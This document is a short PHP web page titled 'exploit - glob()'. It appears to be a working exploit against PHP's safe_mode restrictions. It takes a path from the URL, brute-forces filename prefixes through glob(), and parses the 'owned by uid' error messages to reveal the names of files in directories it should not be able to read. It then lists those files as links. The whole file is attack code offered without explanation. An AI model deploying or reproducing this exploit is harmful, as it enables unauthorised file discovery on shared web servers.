<!DOCTYPE HTML public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
<title>exploit - glob()</title>
</head>
<body>
<?php
$path = realpath($_GET['path']); if (!$path) $path = '/'; if (substr($path,-1,1)!='/') $path .= '/';
echo '<b>',$path=='/'?'/':substr($path,0,strlen($path)-1),"</b><br>\n"; $foo = array('','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9','+','-',' ',',','.','_',';','!','(',')','=','%','&','$','#','@','~');
foreach ($foo as $y) { $param = $path.$y.'*';
@glob($param); eregi('(/.*owned by uid)', $php_errormsg, $regs); $bar[] = substr(basename(substr($regs[0],0,strlen($regs[0])-13)),0,1);
}
$bar = array_unique($bar);
foreach ($foo as $k) { foreach ($foo as $j) { foreach ($bar as $i) { $char = $i.$j.$k;
$param = $path.$char.'*';
@glob($param); eregi('(/.*owned by uid)', $php_errormsg, $regs); $files[] = basename(substr($regs[0],0,strlen($regs[0])-13));
}
}
}
sort($files);
foreach (array_unique($files) as $dump) { echo '<a href="glob2.php?path=',$path,$dump,'" title="',$path,$dump,'">',$dump,"</a><br>\n";
}
?>
</body>
</html>